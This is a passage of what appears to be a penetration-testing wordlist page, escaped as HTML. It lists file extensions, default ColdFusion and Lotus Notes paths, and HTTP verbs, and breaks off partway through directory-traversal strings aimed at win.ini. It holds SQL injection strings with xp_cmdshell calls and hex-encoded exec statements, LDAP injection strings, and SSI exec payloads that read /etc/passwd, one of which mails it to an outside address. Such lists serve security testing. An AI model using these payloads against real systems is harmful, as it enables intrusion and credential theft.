.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
